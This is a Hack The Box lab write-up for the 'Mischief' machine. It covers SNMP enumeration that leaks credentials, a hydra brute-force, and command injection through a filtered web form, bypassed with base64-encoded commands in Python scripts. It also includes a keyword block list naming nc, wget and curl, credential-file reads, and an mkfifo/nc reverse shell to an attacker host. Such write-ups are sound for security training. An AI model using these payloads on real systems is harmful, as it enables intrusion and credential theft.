Writeup: Hack The Box - Machines - Mischief

dodo

21-09-2018 (Updated: 13-12-2020)

writeups

htb, machines

Description

Name: Mischief
IP: 10.10.10.92
Author: trickster0
Difficulty: 6.4/10

Discovery

nmap -sV -sC -Pn -p 1-65535 -T5 --min-rate 1000 --max-retries 5 10.10.10.92

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 2a:90:a6:b1:e6:33:85:07:15:b2:ee:a7:b9:46:77:52 (RSA)
|   256 d0:d7:00:7c:3b:b0:a6:32:b2:29:17:8d:69:a6:84:3f (ECDSA)
|_  256 3f:1c:77:93:5c:c0:6c:ea:26:f4:bb:6c:59:e9:7c:b0 (ED25519)
3366/tcp open  caldav  Radicale calendar and contacts server (Python BaseHTTPServer)
| http-auth:
| HTTP/1.0 401 Unauthorized\x0D
|_  Basic realm=Test
|_http-server-header: SimpleHTTP/0.6 Python/2.7.15rc1
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

nmap -sV -sC -sU --top-ports 1000 10.10.10.92

1 2	PORT STATE SERVICE REASON 161/udp open snmp udp-response ttl 63

For snmp port we runned an advanced scan:

nmap -sU -p 161 --script default,snmp-info 10.10.10.92

PORT    STATE SERVICE
161/udp open  snmp
| snmp-info:
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: b6a9f84e18fef95a00000000
|   snmpEngineBoots: 19
|_  snmpEngineTime: 24m25s
| snmp-interfaces:
|   lo
|     IP address: 127.0.0.1  Netmask: 255.0.0.0
|     Type: softwareLoopback  Speed: 10 Mbps
|     Traffic stats: 0.00 Kb sent, 0.00 Kb received
|   Intel Corporation 82545EM Gigabit Ethernet Controller (Copper)
|     IP address: 10.10.10.92  Netmask: 255.255.255.0
|     MAC address: 00:50:56:b9:73:1a (VMware)
|     Type: ethernetCsmacd  Speed: 1 Gbps
|_    Traffic stats: 2.36 Mb sent, 17.58 Mb received
| snmp-netstat:
|   TCP  0.0.0.0:22           0.0.0.0:0
|   TCP  0.0.0.0:3366         0.0.0.0:0
|   TCP  127.0.0.1:3306       0.0.0.0:0
|   TCP  127.0.0.53:53        0.0.0.0:0
|   UDP  0.0.0.0:161          *:*
|   UDP  0.0.0.0:48675        *:*
|_  UDP  127.0.0.53:53        *:*
| snmp-processes:
|   1:
|     Name: systemd
|     Path: /sbin/init
|     Params: maybe-ubiquity
|   2:
|     Name: kthreadd
|   3:
|     Name: kworker/0:0
|   4:
|     Name: kworker/0:0H
|   5:
|     Name: kworker/u2:0
|   6:
|     Name: mm_percpu_wq
|   7:
|     Name: ksoftirqd/0
|   8:
|     Name: rcu_sched
|   9:
|     Name: rcu_bh
|   10:
|     Name: migration/0
|   11:
|     Name: watchdog/0
|   12:
|     Name: cpuhp/0
|   13:
|     Name: kdevtmpfs
|   14:
|     Name: netns
|   15:
|     Name: rcu_tasks_kthre
|   16:
|     Name: kauditd
|   17:
|     Name: khungtaskd
|   18:
|     Name: oom_reaper
|   19:
|     Name: writeback
|   20:
|     Name: kcompactd0
|   21:
|     Name: ksmd
|   22:
|     Name: khugepaged
|   23:
|     Name: crypto
|   24:
|     Name: kintegrityd
|   25:
|     Name: kblockd
|   26:
|     Name: ata_sff
|   27:
|     Name: md
|   28:
|     Name: edac-poller
|   29:
|     Name: devfreq_wq
|   30:
|     Name: watchdogd
|   34:
|     Name: kswapd0
|   35:
|     Name: ecryptfs-kthrea
|   77:
|     Name: kthrotld
|   78:
|     Name: acpi_thermal_pm
|   79:
|     Name: scsi_eh_0
|   80:
|     Name: scsi_tmf_0
|   81:
|     Name: scsi_eh_1
|   82:
|     Name: scsi_tmf_1
|   85:
|     Name: kworker/0:2
|   89:
|     Name: ipv6_addrconf
|   98:
|     Name: kstrp
|   115:
|     Name: charger_manager
|   164:
|     Name: mpt_poll_0
|   165:
|     Name: mpt/0
|   166:
|     Name: kworker/0:1H
|   204:
|     Name: scsi_eh_2
|   205:
|     Name: scsi_tmf_2
|   206:
|     Name: ttm_swap
|   208:
|     Name: irq/16-vmwgfx
|   272:
|     Name: raid5wq
|   323:
|     Name: jbd2/sda2-8
|   324:
|     Name: ext4-rsv-conver
|   372:
|     Name: vmtoolsd
|     Path: /usr/bin/vmtoolsd
|   373:
|     Name: systemd-journal
|     Path: /lib/systemd/systemd-journald
|   376:
|     Name: iscsi_eh
|   390:
|     Name: lvmetad
|     Path: /sbin/lvmetad
|     Params: -f
|   391:
|     Name: systemd-udevd
|     Path: /lib/systemd/systemd-udevd
|   394:
|     Name: ib-comp-wq
|   396:
|     Name: ib_mcast
|   397:
|     Name: ib_nl_sa_wq
|   401:
|     Name: rdma_cm
|   502:
|     Name: systemd-network
|     Path: /lib/systemd/systemd-networkd
|   509:
|     Name: systemd-timesyn
|     Path: /lib/systemd/systemd-timesyncd
|   515:
|     Name: systemd-resolve
|     Path: /lib/systemd/systemd-resolved
|   539:
|     Name: systemd-logind
|     Path: /lib/systemd/systemd-logind
|   540:
|     Name: networkd-dispat
|     Path: /usr/bin/python3
|     Params: /usr/bin/networkd-dispatcher
|   541:
|     Name: lxcfs
|     Path: /usr/bin/lxcfs
|     Params: /var/lib/lxcfs/
|   544:
|     Name: atd
|     Path: /usr/sbin/atd
|     Params: -f
|   547:
|     Name: VGAuthService
|     Path: /usr/bin/VGAuthService
|   548:
|     Name: accounts-daemon
|     Path: /usr/lib/accountsservice/accounts-daemon
|   549:
|     Name: cron
|     Path: /usr/sbin/cron
|     Params: -f
|   550:
|     Name: dbus-daemon
|     Path: /usr/bin/dbus-daemon
|     Params: --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
|   553:
|     Name: cron
|     Path: /usr/sbin/CRON
|     Params: -f
|   559:
|     Name: rsyslogd
|     Path: /usr/sbin/rsyslogd
|     Params: -n
|   560:
|     Name: snmpd
|     Path: /usr/sbin/snmpd
|     Params: -Lsd -Lf /dev/null -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f
|   573:
|     Name: sh
|     Path: /bin/sh
|     Params: -c /home/loki/hosted/webstart.sh
|   574:
|     Name: polkitd
|     Path: /usr/lib/policykit-1/polkitd
|     Params: --no-debug
|   575:
|     Name: sh
|     Path: /bin/sh
|     Params: /home/loki/hosted/webstart.sh
|   589:
|     Name: python
|     Path: python
|     Params: -m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki --dir /home/loki/hosted/
|   652:
|     Name: sshd
|     Path: /usr/sbin/sshd
|     Params: -D
|   663:
|     Name: iscsid
|     Path: /sbin/iscsid
|   664:
|     Name: iscsid
|     Path: /sbin/iscsid
|   723:
|     Name: mysqld
|     Path: /usr/sbin/mysqld
|     Params: --daemonize --pid-file=/run/mysqld/mysqld.pid
|   727:
|     Name: agetty
|     Path: /sbin/agetty
|     Params: -o -p -- \u --noclear tty1 linux
|   777:
|     Name: apache2
|     Path: /usr/sbin/apache2
|     Params: -k start
|   779:
|     Name: apache2
|     Path: /usr/sbin/apache2
|     Params: -k start
|   780:
|     Name: apache2
|     Path: /usr/sbin/apache2
|     Params: -k start
|   781:
|     Name: apache2
|     Path: /usr/sbin/apache2
|     Params: -k start
|   782:
|     Name: apache2
|     Path: /usr/sbin/apache2
|     Params: -k start
|   783:
|     Name: apache2
|     Path: /usr/sbin/apache2
|     Params: -k start
|   1051:
|     Name: kworker/u2:1
|   1070:
|_    Name: kworker/u2:2
| snmp-sysdescr: Linux Mischief 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
|_  System uptime: 24m26.08s (146608 timeticks)
| snmp-win32-software:
|   accountsservice-0.6.45-1ubuntu1; 0-01-01T00:00:00
|   acl-2.2.52-3build1; 0-01-01T00:00:00
|   [...]
|   xxd-2:8.0.1453-1ubuntu1; 0-01-01T00:00:00
|   xz-utils-5.2.2-1.3; 0-01-01T00:00:00
|   zerofree-1.0.4-1; 0-01-01T00:00:00
|_  zlib1g-1:1.2.11.dfsg-0ubuntu2; 0-01-01T00:00:00

Pwn

Accessing the port 3366 via browser we are asked to inser HTTP credentials.
From the snmp scan we found that the PID 589 is associate with a python program:

| Params: -m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki --dir /home/loki/hosted/

The process simply spawn a HTTP server on port 3366 with user loki and password godofmischiefisloki.

Simple Network Management Protocol (SNMP) is an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior. Devices that typically support SNMP include cable modems, routers, switches, servers, workstations, printers, and more.

SNMP is widely used in network management for network monitoring. SNMP exposes management data in the form of variables on the managed systems organized in a management information base (MIB) which describe the system status and configuration. These variables can then be remotely queried (and, in some circumstances, manipulated) by managing applications.

Using those credentials we can login on port 3366.
From the main page we found another pair of credentials:

1 2	loki godofmischiefisloki loki trickeryanddeceit

From snmp-netstat we saw that there are other ports open bind to \*:\*:

| snmp-netstat:
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 0.0.0.0:3366 0.0.0.0:0
| TCP 127.0.0.1:3306 0.0.0.0:0
| TCP 127.0.0.53:53 0.0.0.0:0
| UDP 0.0.0.0:161 \*:\*
| UDP 0.0.0.0:48675 \*:\*
| UDP 127.0.0.53:53 \*:\*
|

so used snmpwalk to extend our analysis on the service.

snmpwalk -v 2c -c public 10.10.10.92 (very long output and scan)

Se found also the IPv6s of the machine:

1 2	dead:beef:0000:0000:0250:56ff:feb9:731a fe80:0000:0000:0000:0250:56ff:feb9:731a

and with a nmap scan we found an Apache server on port 80 running on the ipv6.

nmap -p 1-65535 -Pn -sV -T4 -6 dead:beef:0000:0000:0250:56ff:feb9:731a

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The page asks for a login and no know vulnerabilities were found on the form so we started hydra with usernames from namelist.txt (from metasploit) and passwords:

1 2	godofmischiefisloki trickeryanddeceit

The program returned a pair of credentials:

Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-09-21 17:33:47
[DATA] max 64 tasks per 1 server, overall 64 tasks, 22908 login tries (l:1909/p:12), ~358 tries per task
[DATA] attacking http-post-form://mischief.htb:80//login.php:user=^USER^&password=^PASS^:Sorry, those credentials do not match
[80][http-post-form] host: mischief.htb   login: administrator   password: trickeryanddeceit

The web form simply execute every command insert but some of them are blacklisted, we can use:

cat
echo
ping
tar
sh
source
sleep
id
whoami
python

but the main problem is that we don’t have any output.

After many tries we found that we can have the output of the command only if we add another command:

curl -X POST http://mischief.htb/ --data="command=<cmd1>;<cmd2>" will prints the output of <cmd1>

N.B.: mischief.htb is simply a hosts binding for the IPv6 address

curl -X POST http://mischief.htb/ Cookie:"PHPSESSID=0shjckk27ntheutfa7gpko3763" --data "command=cat /etc/passwd;id"

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
loki:x:1000:1004:loki:/home/loki:/bin/bash
Debian-snmp:x:111:113::/var/lib/snmp:/bin/false
mysql:x:112:115:MySQL Server,,,:/nonexistent:/bin/false

We wrote a simple script to interact with the machine:

import requests
from sys import argv

url = "http://dead:beef:0000:0000:0250:56ff:feb9:731a/"
url = "http://mischief.htb/"

command = " ".join(argv[1:])
command += ";id"
r = requests.post(url, data={"command": command})

print(r.text.split("</html>")[1].strip())

And we first exilfrated MySQL credentials:

$server = 'localhost';
$username = 'debian-sys-maint';
$password = 'nE1S9Aw1L0Ky3Y9h';
$database = 'dbpanel';

Since we can’t use ls we need to find escape the shell constraints.

Searching for escaping techiniques we found that we can base64-encode a command and the issue the command echo -n "<aBase64String>|base64 -d|sh" to actually run the command on the remote machine.

import requests
from base64 import b64encode
from sys import argv

url = "http://dead:beef:0000:0000:0250:56ff:feb9:731a/"
url = "http://mischief.htb/"

command = " ".join(argv[1:])
command = "echo -n " + b64encode(
    command.encode()).decode() + "|base64 -d|sh"
command += ";id"
r = requests.post(url, data={"command": command})

print(r.text.split("</html>")[1].strip())

Now we can run all shell commands!

In /home/loki we found a credentials file (user.txt is not readable from www-data):

1
2
3

python cmd_loki.py "cat /home/loki/credentials"
pass: lokiisthebestnorsegod
Command was executed succesfully!

We can now login with SSH a loki and get the user flag:

Running LinEnum it did not show something exploitables and now know exploit exists for the kernel version 4.15.0-20 so we focused on known services that could hide some credentials/informations.

From MySQL:

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dbpanel            |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.00 sec)

mysql> use dbpanel;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-------------------+
| Tables_in_dbpanel |
+-------------------+
| users             |
+-------------------+
1 row in set (0.00 sec)

mysql> select * from users;
+----+---------------+--------------------------------------------------------------+
| id | user          | password                                                     |
+----+---------------+--------------------------------------------------------------+
|  2 | administrator | $2y$10$0OeEYPgdvzU1XTLsKUkaIuyN3PTBQSC4oALTICEZOllPJKq1uUAkq |
+----+---------------+--------------------------------------------------------------+
1 row in set (0.00 sec)

# trickeryanddeceit

and from .mysql_history:

_HiStOrY_V2_
yse\040mysql;
use\040mysql;
SELECT\040User,\040Host,\040plugin\040FROM\040mysql.user;
FLUSH\040PRIVILEGES;
exit

From /var/www/html/index.php we have the list of blacklisted commands and understand why we need to supply two commands to see the output:

if(isset($_POST['command'])) {
	$cmd = $_POST['command'];
	if (strpos($cmd, "nc" ) !== false){
		echo "Command is not allowed.";
	} elseif (strpos($cmd, "bash" ) !== false){
		echo "Command is not allowed.";
	} elseif (strpos($cmd, "chown" ) !== false){
		echo "Command is not allowed.";
	} elseif (strpos($cmd, "setfacl" ) !== false){
		echo "Command is not allowed.";
	} elseif (strpos($cmd, "chmod" ) !== false){
		echo "Command is not allowed.";
	} elseif (strpos($cmd, "perl" ) !== false){
		echo "Command is not allowed.";
	} elseif (strpos($cmd, "find" ) !== false){
		echo "Command is not allowed.";
	} elseif (strpos($cmd, "locate" ) !== false){
		echo "Command is not allowed.";
	} elseif (strpos($cmd, "ls" ) !== false){
		echo "Command is not allowed.";
	} elseif (strpos($cmd, "php" ) !== false){
		echo "Command is not allowed.";
	} elseif (strpos($cmd, "wget" ) !== false){
		echo "Command is not allowed.";
	} elseif (strpos($cmd, "curl" ) !== false){
		echo "Command is not allowed.";
	} elseif (strpos($cmd, "dir" ) !== false){
		echo "Command is not allowed.";
	} elseif (strpos($cmd, "ftp" ) !== false){
		echo "Command is not allowed.";
	} elseif (strpos($cmd, "telnet" ) !== false){
		echo "Command is not allowed.";
	} else {
		system("$cmd > /dev/null 2>&1");
		echo "Command was executed succesfully!";
	}
}

From loki‘s bash history we found that he executed sudo su, su and sudo -l but now those commands returns -bash: /usr/bin/sudo: Permission denied.

python -m SimpleHTTPAuthServer loki:lokipasswordmischieftrickery
exit
free -mt
ifconfig
cd /etc/
sudo su
su
exit
su root
ls -la
sudo -l
ifconfig
id
cat .bash_history
nano .bash_history
exit

Since we know that there is sudo involed we returned to www-data and spawned a reverse shell (using IPv6) using our RCE:

python cmd_loki.py "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc dead:beef:X::XXXX 4444 >/tmp/f"

from www-data we can use su and bruteforce the passwords that we found since now we get root!!! (NOSENSE AT ALL :D :D :D)

After a hint we found (with find) the real flag: